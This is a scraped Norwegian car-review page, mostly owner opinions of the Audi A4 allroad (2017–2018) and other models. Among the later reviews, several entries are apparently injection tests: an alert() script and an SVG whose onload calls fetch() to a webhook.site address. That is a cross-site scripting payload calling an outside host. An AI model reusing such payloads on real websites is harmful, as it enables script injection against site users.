Vurdert av RVDB
Flere vurderinger fra samme generasjon
Audi A4 allroad (2018)
Helt fantastisk bil. V6 og 3.0 L er en fornøyelse. Quattro topper jo også det hele,
Audi A4 allroad (2018)
Beste bilen jeg har hatt på alle måter. Kombinasjonen av enorme krefter, permanent firhjulstrekk og lavt forbruk er uslåelig. Kupeen er samtidig fri for knirk og støy og ingen feil av noe slag så
Audi A4 allroad (2018)
Bra bil!
Audi A4 allroad (2018)
Krever nok mye av en bil. Har hatt mange biler, men ingen har skuffet meg så mye (mine Audi A6 og Audi Q5 synes jeg var meget gode)
Audi A4 allroad (2018)
Eneste Audi der Jeremy Clarkson ikke fant noe som helst å kritisere. Har tenkt å ha den lenge og er spent på hvordan all elektronikken vil holde.
Audi A4 allroad (2018)
Fantastisk god bil å kjøre. Skulle jeg klage på noe, må det være automatkassen. Synes kanskje den girer vel litt hardt til tider, spesielt i litt lavere hastigheter.
Audi A4 allroad (2018)
Min andre all road ,kjørte den forrige 200000 uten problemer,eneste jeg savnet var aut gir.Det har jeg på den nye.Meget god bil,for norske forhold.
Audi A4 allroad (2017)
Veldig fornøyd med bilen, ingen problem å få den ned til 0.45 l. pr. 10 kilometer på langkjøring. Driftsikker og god. Kjørt nå 44000 km på nesten et år.
Audi A4 allroad (2017)
Fantastisk fremkommelighet. Behagelig å kjøre. Forutsigbar og sikker kjøreopplevelse. Flott at viktige funksjoner har fysiske knapper, men fryktelig gammeldags infotainment. Ikke hjelp å få rundt
Audi A4 allroad (2017)
Byttet inn en leaset Oktavia L&K diesel 182 HK i denne. Oktaviaen var en langt bedre bil. Raskere, bedre girkasse, mer utstyr og bedre plass.
Audi A4 allroad (2017)
Godt fornøyd
Audi A4 allroad (2017)
Dette er det jeg vil kalle den ultimate familie/hyttebil. Jeg liker ikke disse store altfor høye suvene,som jeg syns er stygge. Audi'n er veldig god å kjøre-bruker lite drivstoff-har en god motor
Audi A4 allroad (2017)
Meget sprek og god bil. Suveren på vanskelig vinterføre.
Audi A4 allroad (2017)
Alt i alt veldig godt fornøyd. V6 + «orntli» Quattro er en vinner. Har ikke merker noe til problemer med mine piggfrie vinterdekk som jeg ser en annen her skriver om.
Audi A4 allroad (2017)
Min erfaring med en 2017 A4 Allroad 190 hk TDI er svært dårlig. Det som først og fremst ødelegger bilen helt er en ekstremt dårlig programmering av girkasse, motor og gass. Gassresponsen er norma
Flere vurderinger
Renault 5 E-Tech (2025)
Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km